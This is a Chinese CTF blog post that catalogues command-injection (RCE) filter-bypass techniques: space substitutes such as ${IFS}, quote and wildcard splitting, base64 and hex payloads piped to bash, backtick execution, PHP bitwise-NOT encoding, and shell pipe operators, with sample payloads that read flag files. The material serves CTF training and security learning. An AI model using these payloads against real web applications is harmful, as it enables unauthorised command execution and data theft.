命令执行 rce各种绕过技巧

已于 2024-01-13 22:40:59 修改
阅读量2k 收藏 42
点赞数 54
分类专栏: CTF 文章标签: chrome 前端 安全 web安全
于 2024-01-13 22:30:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62102520/article/details/135577112
版权
本文详细介绍了命令执行漏洞的概念,成因,以及在Linux和Windows系统中的常见绕过方法,包括利用空格、特殊字符、环境变量、编码技巧、管道符等,旨在提升网络安全意识和技术防护措施。
摘要由CSDN通过智能技术生成

目录

目录

命令执行漏洞简介

1. linux读取命令

2.空格

3.常见的命令执行函数

4.字符过滤

1.单双引号反斜杠保住命令,如"l"'s','和"称为连接符,用来连接字符串,l``s

2.使用通配符? *例如:cat *.txt

3.base64,ASCII,shellcode编码绕过,例如过滤cat

4.拼接命令实现过滤例如#cat flag.php

5.使用环境变量

6.ban掉括号使用反引号实现通杀解

7.使用换行符\

8.无回显函数执行

9.未定义的初始化变量(空变量)

10.printf绕过(字符串进制绕过)

5.取反绕过

6.windows 和 linux 管道符

windows

linux

命令执行漏洞简介

命令执行漏洞就是黑客可以直接在web应用中执行系统命令,从而获取敏感信息或者拿下shell权限。

命令执行漏洞成因命令执行漏洞形成的原因是web服务器对用户输入的命令安全监测不足,导致恶意代码被执行。

接下来是各种命令执行的绕过技巧

1. linux读取命令

cat
tac tac命令的功能是用于反向显示文件内容.也就是说,当我们使用tac命令查看文件内容时,最先显示的是最后一行,倒数第二行,倒数第三行,以此类推到最后显示原本文件的第一行内容。
head head命令的功能是显示文件开头的内容,默认为前10行。
more
less
tail
od od命令会读取所给予的文件的内容,并将其内容以八进制字码呈现出来。
nl
uniq
sort
rev

2.空格

` 1.重定向符,文件读取时,可用cat<>flag.php,单独使用<似乎也可以`

`2.${IFS},$IFS$9,$IFS

${IFS}:

$IFS$9:

`3.控制字符代替,%09(tab),%0a`

`4.字符串截取空格,例如ctfshow=aabbcc,${ctfshow}=aabbcc,${ctfshow:2}=bbcc,${ctfshow:4:1}=c,有理论基础就可以通过已经定义的环境变量来构造字符串。`
5.在bash下还可以使用{cmd,args}`,例如{cat,text}

3.常见的命令执行函数

system():执行外部函数,并且显示输出

passthru():执行外部程序并且显示原始输出

shell_exec(): 通过shell执行命令并将完整的输出以字符串的方式返回

exec():执行外部函数:
针对exec()无回显函数,可以执行ls /|tee 1.txt,将内容保存到1.txt中,然后访问

4.字符过滤

1.单双引号反斜杠保住命令,如"l"'s','和"称为连接符,用来连接字符串,l``s
 


2.使用通配符? *例如:cat *.txt
 

3.base64,ASCII,shellcode编码绕过,例如过滤cat

base64:
echo t|base64,将t转为base64编码
ca$(echo 'dAo'|base64 -d) 1.txt



ACSII码:
import binascii
s = b"tac flag"
h = binascii.b2a_hex(s)
print(h)
echo "74616320666c61672e706870" |xxd -r -p|bash
?cmd=passthru('echo "74616320666c61672e706870"|xxd -r -p|bash');

shellcode:
例如: echo "\x63\x61\x74\x20\x31\x2e\x74\x78\x74"|bash
`(echo "\x63\x61\x74\x20\x31\x2e\x74\x78\x74")`,反引号执行()里的命令

4.拼接命令实现过滤例如#cat flag.php

a=ca;b=t;m=flag;n=.php;$a$b $m$n


5.使用环境变量
6.ban掉括号使用反引号实现通杀解

cat `echo `1.txt``

echo `1.txt`|base64
cat `echo 'MSS0eHQK'|base64 -d`


7.使用换行符\

例如执行命令 ca\t 1.t\xt

8.无回显函数执行

使用延时函数,例如ls|sleep 3

9.未定义的初始化变量(空变量)

cat 1.t${x}xt

10.printf绕过(字符串进制绕过

\NNN 八进制数 NNN 所代表的 ASCII 码字符。

\xHH 十六进制 HH 对应的8位字符。HH 可以是一到两位。

\uHHHH 十六进制 HHHH 对应的 Unicode 字符。HHHH 一到四位。

\UHHHHHHHH十六进制 HHHHHHHH 对应的 Unicode 字符。HHHHHHHH 一到八位

5.取反绕过

php代码:
<?php
echo urlencode(~"system");
print("\n");
echo urlencode(~"cat /f*");

6.windows 和 linux 管道符

windows

| 直接执行后面的命令。
|| 前面执行的命令执行出错才执行后面的语句。
& 前面的语句无论真假都可以执行后面的语句。(无条件执行后面的语句,推荐使用。)
&& 前面语句为真才能执行后面的语句。

linux

Linux系统支持的管道符:
| 显示后面语句的执行结果。

fig:


; 执行完前面的语句再执行后面的。
|| 前面语句执行错误才执行后面的语句。
& 前面语句无论真假都会执行后面的语句。(无条件执行后面的语句,推荐使用。)

&& 前面的语句为真才能执行后面的语句。

fig:

探险者安全团队
关注
  • 54
    点赞
  • 42
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
异或脚本rce题目绕过正则表达式必备
12-28
字符串转换成异或型,用于rce绕过正则表达式
命令执行漏洞
大河之犬的博客
05-30 896
命令执行漏洞(RCE)是一种常见的Web安全漏洞,它允许攻击者在受害者服务器上执行未经授权的命令。这种漏洞通常出现在Web应用程序中,当用户输入的内容被直接用来构造系统命令执行时,如果没有适当的输入验证和过滤,就可能导致命令注入。漏洞危害获取服务器权限获取敏感数据文件写入恶意文件getshell植入木马病毒勒索软件。
命令执行(RCE)面对各种过滤,骚姿势绕过总结
最新发布
HUANGXIN9898的博客
07-09 670
RCE又称远程代码执行漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。
【网络安全】RCE漏洞讲解、绕过方式及实例介绍
等风来
05-13 974
4、passthru():能将字符串作为OS命令执行,只调用命令不返回任何结果,但把命令的运行结果原样输出到标准输出设备上;6、call_user_func_array():回调函数,第一个参数为函数名,第二个参数为函数参数的数组。2、exec():能将字符串作为OS命令执行,但是只返回执行结果的最后一行(约等于无回显)5、call_user_func():回调函数,第一个参数为函数名,第二个参数为函数的参数。1、system():能将字符串作为OS命令执行,且返回命令执行结果;
命令执行各种绕过总结
m0_64815693的博客
10-11 8664
最近做了题目很多都有命令执行的,这里给自己做一次总结,也给大家一个参考,有各种绕过,十分的详细哦
网安入门21——RCE绕过方法梳理)
m0_61499194的博客
10-04 298
所以前面的“IFS”可以改为 “$IFS$9”。less:和more类似,但其优点可以往前翻页,而且进行可以搜索字符。9表示当前系统shell进程的第九个参数,通常是一个空字符。tac:从最后一行倒序显示内容,并将所有内容输出。cat:由第一行开始显示内容,并将所有内容输出。more:根据窗口大小,一页一页的现实文件内容。是Linux存在的环境变量,是内部字段分隔符。反引号可以将ls列出的内容全部cat输出一遍。nl:类似于cat -n,显示时输出行号。目标是获取flag.txt的内容。
命令执行RCE及其绕过详细总结(各情景下的绕过
2301_76690905的博客
12-12 5020
scandir() :将返回当前目录中的所有文件和目录的列表。返回的结果是一个数组,其中包含当前目录下的所有文件和目录名称(glob()可替换)localeconv() :返回一包含本地数字及货币格式信息的数组。(但是这里数组第一项就是‘.’,这个.的用处很大)current() :返回数组中的单元,默认取第一个值。pos()和current()是同一个东西getcwd() :取得当前工作目录dirname():函数返回路径中的目录部分。
常见命令执行的一些绕过方式
qq_53142368的博客
04-26 6244
文章目录一、命令执行二、绕过技巧1.常见管道符2. 空格过滤3. 黑名单绕过4. 绕过长度限制5. ls命令6. 各种读文件命令 一、命令执行 1. php调用外部程序常用的函数: system()—执行shell命令也就是向dos发送一条指令。 shell_exec() — 通过 shell 环境执行命令,并且将完整的输出以字符串的方式返回。 exec() —执行外部程序。 passthru() — 执行外部程序并且显示原始输出。 2. 造成命令执行的原因 代码过滤不严格–如使用system函数调用封装
CTF中的命令执行绕过
蚁景网安学院
04-21 3236
作为CTF最基础的操作,命令执行的学习主要是为了以后进一步使用webshell打下基础
CVE-2020-0688 Exchange RCE 任意命令执行
03-29
# CVE-2020-0688 Exchange RCE 前提: 已知一个域用户 影响版本: -Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30 -Microsoft Exchange Server 2013 Cumulative Update 23 -Microsoft ...
shiro_rce_tool:shiro rce tool 反序列 命令执行 一键工具 回显
04-29
shiro_rce 下载地址:https://xz.aliyun.com/forum/upload/affix/shiro_tool.zip 2021-03-31: 新增自定义或随机useragent randomagent --> random useragent useragent= --> set useragent cookiename= --&...
xml执行java源码-Axis-1.4-RCE-Poc:Axis<=1.4远程命令执行RCE)POC
06-06
远程命令执行RCE) POC 环境准备 首先下载Axis1.4 本仓库有一个打包好的axis直接解压到tomcat webapps下即可 ,web-inf/web.xml 去掉AdminServlet注释 然后,server-config.wsdd文件开启enableRemoteAdmin (本地...
RCE(远程命令执行)绕过总结
Elite的博客
04-18 3516
常见的RCE(远程命令执行)漏洞绕过方法,及原理讲解,干货满满!
五、Linux命令执行绕过技巧
黑日里不灭的light
11-07 577
Linux命令执行绕过指的是,你在进行web测试,已经拿到了找到了执行linux命令的地方,但是有过滤,比如输入ls会被过滤掉,但是l\s可能就不会过滤(l\s和ls一样同样能被执行
【网络安全---Linux命令绕过】Linux下命令执行绕过技巧(很全,很实用)
m0_67844671的博客
09-24 2285
Linux下命令执行绕过方式和思路;网站上可能有一些能执行系统命令的地方,但是对一些关键字和空格等做了一些防护,如何绕过就成了一个难题,这篇文章分享一些Linux下的命令执行绕过技巧以及思路,不如说空格的绕过,关键字绕过,编码绕过等等;
无参数RCE绕过的详细总结(六种方法)
2301_76690905的博客
10-26 3060
scandir() :将返回当前目录中的所有文件和目录的列表。返回的结果是一个数组,其中包含当前目录下的所有文件和目录名称(glob()可替换)localeconv() :返回一包含本地数字及货币格式信息的数组。(但是这里数组第一项就是‘.’,这个.的用处很大)current() :返回数组中的单元,默认取第一个值。pos()和current()是同一个东西getcwd() :取得当前工作目录dirname():函数返回路径中的目录部分。
CTFWeb-命令执行漏洞过滤的绕过姿势
热门推荐
道阻且长,行则将至。
04-29 1万+
文章目录前言CTF题目绕过姿势命令联合执行关键词的绕过内联执行绕过多种解法变量拼接内联执行Base64编码总结 前言 为了备战(划水)5 月份广东省的 “红帽杯” 网络安全竞赛,继续开始到 BUUCTF 平台练习 CTF 题目。在去年参加的第四届强网杯全国网络安全竞赛中,就遇到过命令执行漏洞绕过的题目 CTF解题-2020年强网杯参赛WriteUp(题目名称 “主动” ),当时采用了 base64 编码联合反引号、变量拼接两种方式绕过了 flag 关键字的过滤并读取了 flag 值: 本文目的在于结合 BU
一个命令执行绕过方法居然被同事嫖走了
liuhyusb的博客
11-23 91
我偷偷总结了一下命令执行绕过方法,不小心被同事看到了,然后他就给“借”走了。。
springboot rce
09-12
Spring Boot RCE(Remote Code Execution)是指利用Spring Boot框架中的漏洞,通过远程执行恶意代码来实现攻击的一种情况。 Spring Boot本身并不容易受到RCE攻击,但如果应用程序在使用Spring Boot时存在安全漏洞,攻击者可能会利用这些漏洞来执行远程代码。 要防止Spring Boot RCE攻击,可以考虑以下几个方面: 1. 及时更新:确保使用的Spring Boot版本是最新的,因为更新版本通常会修复已知的安全漏洞。 2. 安全配置:在应用程序的配置文件中,确保采取了适当的安全措施,如禁用不必要的功能、限制用户输入等。 3. 输入验证:对于从用户获取的任何输入,都需要进行有效的验证和过滤,以防止恶意代码注入。 4. 访问控制:限制对敏感资源的访问,并确保只有授权用户可以执行特定操作。 5. 安全审计:监控和记录应用程序的行为,以便及时检测和响应潜在的攻击。 请注意,以上仅是一些常见的防范措施,并不能保证完全阻止所有类型的RCE攻击。因此,建议在开发和部署应用程序时综合考虑多个安全层面,并遵循最佳实践来保护应用程序的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值